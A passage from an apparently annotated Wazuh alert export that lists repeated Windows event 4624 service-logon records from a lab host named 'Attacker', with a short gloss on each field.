- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533925.362999 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:46:40.8641766Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43677 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.370337 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:51:38.0009000Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43707 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.377673 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:51:38.9779159Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43712 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14916 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.385011 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:51:47.2593671Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43718 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.392345 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:52:57.5252040Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43720 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
